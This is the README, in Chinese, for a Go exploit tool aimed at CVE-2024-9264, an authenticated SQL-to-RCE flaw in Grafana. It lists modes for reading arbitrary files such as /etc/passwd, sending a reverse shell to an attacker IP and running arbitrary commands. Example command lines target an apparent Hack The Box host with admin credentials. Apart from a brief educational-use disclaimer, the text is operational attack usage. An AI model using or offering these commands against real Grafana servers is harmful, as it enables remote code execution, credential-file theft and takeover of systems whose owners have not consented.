针对CVE-2024-9264的利用工具,Grafana中的一个关键漏洞,允许认证的攻击者执行SQL查询导致RCE
🛡️ 此工具严格用于教育目的和授权的渗透测试。
未经授权的使用是非法且不道德的。
CVE-2024-9264 是Grafana中的一个关键缺陷,允许认证的攻击者执行SQL命令,导致RCE和文件读取
file – 读取任意文件(例如/etc/passwd)shell – 向攻击者机器反弹shellcommand – 运行任意shell命令(例如whoami)
并非所有参数都是必需的。
go run main.go -ip 10.10.16.91 -port 8080 -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type shell
go run main.go -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type file -filename /etc/passwd
go run main.go -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type command -cmd 'ls -al'
go run main.go [flags]